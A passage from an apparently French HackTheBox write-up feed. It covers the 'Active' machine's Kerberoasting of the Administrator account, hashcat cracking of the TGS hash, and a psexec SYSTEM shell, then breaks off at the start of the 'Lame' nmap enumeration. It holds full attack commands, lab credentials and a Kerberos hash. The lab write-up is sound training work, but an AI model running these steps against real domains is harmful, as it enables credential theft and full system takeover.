01:06:44 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> desktop.ini AHS <span class="m">174</span> Tue Jul <span class="m">14</span> 00:57:55 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> Public DR <span class="m">0</span> Tue Jul <span class="m">14</span> 00:57:55 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> SVC_TGS D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">5217023</span> blocks of size 4096. <span class="m">278586</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> SVC_TGS<span class="se">\ </span></span></span><span class="line"><span class="cl">smb: <span class="se">\S</span>VC_TGS<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Contacts D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:11 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Desktop D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:42 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Downloads D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:23 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Favorites D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:44 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Links D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:14:57 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Documents D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:03 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Music D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:32 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Pictures D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:43 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Videos D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:15:53 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Saved Games D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:12 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Searches D <span class="m">0</span> Sat Jul <span class="m">21</span> 11:16:24 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">5217023</span> blocks of size 4096. <span class="m">278586</span> blocks available </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound1<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo mount -t cifs -o <span class="nv">username</span><span class="o">=</span><span class="s1">&#39;SVC_TGS&#39;</span>,password<span class="o">=</span><span class="s1">&#39;GPPstillStandingStrong2k18&#39;</span> //10.10.10.100/Users/SVC_TGS /mnt/smb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound1<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ xdg-open /mnt/smb </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="kerberoasting-attack-on-spn-cifs">Kerberoasting Attack on SPN &lsquo;CIFS&rsquo; </h3><p>Cette commande exécute l&rsquo;outil <code>GetUserSPNs.py</code> de la suite Impacket pour récupérer les <strong>Service Principal Names</strong> (SPN) configurés dans l&rsquo;Active Directory, liés à des comptes de service. Ici, nous vérifions s&rsquo;il existe un SPN qui pourrait être exploité pour effectuer une attaque de <strong>Kerberoasting</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ impacket-GetUserSPNs active.htb/SVC_TGS:<span class="s2">&#34;GPPstillStandingStrong2k18&#34;</span> -dc-ip 10.10.10.100 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation </span></span><span class="line"><span class="cl">-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- </span></span><span class="line"><span class="cl">active/CIFS:445 Administrator <span class="nv">CN</span><span class="o">=</span>Group Policy Creator Owners,CN<span class="o">=</span>Users,DC<span class="o">=</span>active,DC<span class="o">=</span>htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 </span></span></code></pre></td></tr></table> </div> </div><p>L&rsquo;option -request permet de demander un <strong>ticket TGS</strong> (Ticket Granting Service) pour les <strong>SPN</strong> trouvés. Ce ticket est ensuite extrait sous forme de hash Kerberos, qui pourra être craqué hors ligne.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ impacket-GetUserSPNs active.htb/SVC_TGS:<span class="s2">&#34;GPPstillStandingStrong2k18&#34;</span> -request -dc-ip 10.10.10.100 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation </span></span><span class="line"><span class="cl">-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- </span></span><span class="line"><span class="cl">active/CIFS:445 Administrator <span class="nv">CN</span><span class="o">=</span>Group Policy Creator Owners,CN<span class="o">=</span>Users,DC<span class="o">=</span>active,DC<span class="o">=</span>htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> CCache file is not found. Skipping... </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>Administrator<span class="nv">$ACTIVE</span>.HTB<span class="nv">$active</span>.htb/Administrator*<span class="nv">$8852493078</span>c2a4f352f6468b34dcd243<span class="nv">$38</span>b8aa13f6ffb46cd7866c10ab7d0dc3a54117cfe4cd271fba599fa52f84b826cb94edda0fada6c386721fa3edfc10cf58b23c35cfdbd409e42d9ba81b84cab539fb285d561f7a8c15f3ee813eede43d56618635868377a8b9fe39c0708da79aebe14351a3bcf89b1d6f248a545a042772b27bd528c91df09e5b900df3b5188cd734316acd1416c63bf032540166f0e319db943dc7a099234da10956156f753927dafbb8f1c244df2b4a3c349f333a1cb6d26ae607a037b9a39a0f995f8ba811d7b8dfc58100c6b88b8493c1d85dee40d784f275c24184e727c3e55baa2fa233a28a820e5d04684b320b925588f9eb37568891bef410775ec5c001c0dbbe9b8b1acce9b7b55aa54b37367fabede080a6a270e5a79b49ff27f83f90da85a6bbe4a99210d6fb4a9d01faee68080243f6bc04131beb8111fceeedc87bbdd9168d95d3e15e262ed2a7a0bbda46c0a51bdbb32fc98bd81252f31f928e317b06a768ed51e75e58dc66b430f9638d2996944b324ea624be7fc9a24ff5b2cd4ab9ae0b156fc9747c8c7482b785815c46293b772f1d920c776b2a6aa2ab1bf815543ba5070381cd55f21b4c9b9a70172c3e637dad6e91c1e03651de9f8532e537119b2062f63c92a771ba8fe33b3ca7a674a204331d3f577bff722492b960c241a84c59f63b28b7eeba74c37db41f4d91215e3421d820b39b4a1dfd9477b885385c8bf578718ef8f8ca659818795dd182bc91f7e13afae7cf4e38cf9bb5f4e6530ec9ae3272873e706dd528e52bbedfd39de18621c71eed9556eaec0d53b7655a4b8ec5ee1e54b408f7416197e66ea5650b317deb4b50dda2d1164ce4e51d802e099dbed074edb67b9fa2cf90ae3535fbfad2be12fe224132132040e1e842355ad2783c07c376e2f97017cc84d266bb8127681edfdaae6fa0de25a3092fecb65860d22279a50db9c0f339f5ea4b21fa96007757b9099aca27c87e34403149179c77dcbe5e546db3960f768a2cccbff8fdb869b61c312357186bc803e56b76a503d9716549e53ada50aeb8eaf0018bed0449a63d4a69fb985eacb782f48e5f6c18603ce64ad7f5acc2046798a13de5c8da29e9ec5b763c63d19fdb9fc9d41fd6f704098ff0fda0220ea2ba32ada95eba169827ef9ad50c77475ef5dc45cc56063c28462a1a81786271ed6ae8505d3aca6b81aa9c1e9964a3dec3277a526a239241251a3c05bcbab5b30e596e23c189bcc442170b3b09a3e9f8b2e5d00cae47 </span></span></code></pre></td></tr></table> </div> </div><p>Ce résultat correspond au hash TGS récupéré pour le compte Administrator.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">» vim admin_hash.txt </span></span><span class="line"><span class="cl">» hashcat -m <span class="m">13100</span> -a <span class="m">0</span> admin_hash.txt ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: /home/leopold/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139922195</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>Administrator<span class="nv">$ACTIVE</span>.HTB<span class="nv">$active</span>.htb/Administrator*<span class="nv">$8852493078</span>c2a4f352f6468b34dcd243<span class="nv">$38</span>b8aa13f6ffb46cd7866c10ab7d0dc3a54117cfe4cd271fba599fa52f84b826cb94edda0fada6c386721fa3edfc10cf58b23c35cfdbd409e42d9ba81b84cab539fb285d561f7a8c15f3ee813eede43d56618635868377a8b9fe39c0708da79aebe14351a3bcf89b1d6f248a545a042772b27bd528c91df09e5b900df3b5188cd734316acd1416c63bf032540166f0e319db943dc7a099234da10956156f753927dafbb8f1c244df2b4a3c349f333a1cb6d26ae607a037b9a39a0f995f8ba811d7b8dfc58100c6b88b8493c1d85dee40d784f275c24184e727c3e55baa2fa233a28a820e5d04684b320b925588f9eb37568891bef410775ec5c001c0dbbe9b8b1acce9b7b55aa54b37367fabede080a6a270e5a79b49ff27f83f90da85a6bbe4a99210d6fb4a9d01faee68080243f6bc04131beb8111fceeedc87bbdd9168d95d3e15e262ed2a7a0bbda46c0a51bdbb32fc98bd81252f31f928e317b06a768ed51e75e58dc66b430f9638d2996944b324ea624be7fc9a24ff5b2cd4ab9ae0b156fc9747c8c7482b785815c46293b772f1d920c776b2a6aa2ab1bf815543ba5070381cd55f21b4c9b9a70172c3e637dad6e91c1e03651de9f8532e537119b2062f63c92a771ba8fe33b3ca7a674a204331d3f577bff722492b960c241a84c59f63b28b7eeba74c37db41f4d91215e3421d820b39b4a1dfd9477b885385c8bf578718ef8f8ca659818795dd182bc91f7e13afae7cf4e38cf9bb5f4e6530ec9ae3272873e706dd528e52bbedfd39de18621c71eed9556eaec0d53b7655a4b8ec5ee1e54b408f7416197e66ea5650b317deb4b50dda2d1164ce4e51d802e099dbed074edb67b9fa2cf90ae3535fbfad2be12fe224132132040e1e842355ad2783c07c376e2f97017cc84d266bb8127681edfdaae6fa0de25a3092fecb65860d22279a50db9c0f339f5ea4b21fa96007757b9099aca27c87e34403149179c77dcbe5e546db3960f768a2cccbff8fdb869b61c312357186bc803e56b76a503d9716549e53ada50aeb8eaf0018bed0449a63d4a69fb985eacb782f48e5f6c18603ce64ad7f5acc2046798a13de5c8da29e9ec5b763c63d19fdb9fc9d41fd6f704098ff0fda0220ea2ba32ada95eba169827ef9ad50c77475ef5dc45cc56063c28462a1a81786271ed6ae8505d3aca6b81aa9c1e9964a3dec3277a526a239241251a3c05bcbab5b30e596e23c189bcc442170b3b09a3e9f8b2e5d00cae47:Ticketmaster1968 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">13100</span> <span class="o">(</span>Kerberos 5, etype 23, TGS-REP<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: <span class="nv">$krb5tgs$23$*</span>Administrator<span class="nv">$ACTIVE</span>.HTB<span class="nv">$active</span>.htb/Ad...0cae47 </span></span><span class="line"><span class="cl">Time.Started.....: Sun Jan <span class="m">5</span> 01:39:10 <span class="m">2025</span> <span class="o">(</span><span class="m">1</span> sec<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Sun Jan <span class="m">5</span> 01:39:11 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>/home/leopold/wordlists/rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#1.........: 7678.4 kH/s <span class="o">(</span>9.15ms<span class="o">)</span> @ Accel:1024 Loops:1 Thr:32 Vec:1 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests </span></span><span class="line"><span class="cl">Progress.........: 10616832/14344385 <span class="o">(</span>74.01%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/10616832 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 10321920/14344385 <span class="o">(</span>71.96%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#1....: ahki_22 -&gt; Saboka54 </span></span><span class="line"><span class="cl">Hardware.Mon.#1..: Temp: 36c Fan: 46% Util: 23% Core:1860MHz Mem:3802MHz Bus:16 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Sun Jan <span class="m">5</span> 01:39:09 <span class="m">2025</span> </span></span><span class="line"><span class="cl">Stopped: Sun Jan <span class="m">5</span> 01:39:12 <span class="m">2025</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve le mot de passe de l&rsquo;administrateur ! Administrator:<code>Ticketmaster1968</code></p> <p>On peut maintenant se connecter en SMB et accéder au dossier de l&rsquo;adminstrateur dans le share &ldquo;USERS&rdquo; qui était bloqué auparavant. On obtient bien le flag root.txt.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.10.100/Users -U <span class="s1">&#39;Administrator%Ticketmaster1968&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> Administrator<span class="se">\ </span></span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:21 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:21 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> AppData DHn <span class="m">0</span> Sat Jan <span class="m">4</span> 07:29:39 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> Application Data DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Contacts DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Cookies DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Desktop DR <span class="m">0</span> Thu Jan <span class="m">21</span> 11:49:47 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Documents DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Downloads DR <span class="m">0</span> Thu Jan <span class="m">21</span> 11:52:32 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Favorites DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Links DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Local Settings DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Music DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Documents DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NetHood DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT AHSn <span class="m">524288</span> Sat Jan <span class="m">4</span> 07:30:15 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> ntuser.dat.LOG1 AHS <span class="m">262144</span> Sat Jan <span class="m">4</span> 08:05:30 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> ntuser.dat.LOG2 AHS <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:09 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT<span class="o">{</span>016888bd-6c6f-11de-8d1d-001e0bcde3ec<span class="o">}</span>.TM.blf AHS <span class="m">65536</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT<span class="o">{</span>016888bd-6c6f-11de-8d1d-001e0bcde3ec<span class="o">}</span>.TMContainer00000000000000000001.regtrans-ms AHS <span class="m">524288</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT<span class="o">{</span>016888bd-6c6f-11de-8d1d-001e0bcde3ec<span class="o">}</span>.TMContainer00000000000000000002.regtrans-ms AHS <span class="m">524288</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> ntuser.ini HS <span class="m">20</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Pictures DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> PrintHood DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Recent DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Saved Games DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Searches DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> SendTo DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Start Menu DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Templates DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Videos DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">5217023</span> blocks of size 4096. <span class="m">277230</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\&gt;</span> <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\&gt;</span> cat root.txt </span></span><span class="line"><span class="cl">cat: <span class="nb">command</span> not found </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\&gt;</span> get root.txt </span></span><span class="line"><span class="cl">getting file <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt of size <span class="m">34</span> as root.txt <span class="o">(</span>0.5 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 0.5 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound2<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat root.txt </span></span><span class="line"><span class="cl">5d2a.....fb20 </span></span></code></pre></td></tr></table> </div> </div><h3 id="administrator-shell">Administrator shell </h3><p>Grâce à l&rsquo;outil <strong>psexec.py</strong> de la suite Impacket, j&rsquo;ai pu obtenir un shell interactif avec les privilèges les plus élevés (NT AUTHORITY\SYSTEM) sur la machine cible. Cela a été possible en utilisant les identifiants de l&rsquo;utilisateur Administrator pour se connecter au partage <strong>SMB ADMIN$</strong>, uploader un exécutable temporaire, et créer un service Windows pour l&rsquo;exécuter. Une fois le service démarré, un accès complet au système a été établi, permettant un contrôle total de la machine.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ impacket-psexec Administrator:<span class="s2">&#34;Ticketmaster1968&#34;</span>@10.10.10.100 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on 10.10.10.100..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file lwoxkZvR.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on 10.10.10.100..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service zfLo on 10.10.10.100..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service zfLo..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7601<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/lame-htb/Tue, 17 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/lame-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Lame cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Lame</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.3</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -vvv -sC -sV -An -p- 10.10.10.3 -Pn </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp syn-ack vsftpd 2.3.4 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span 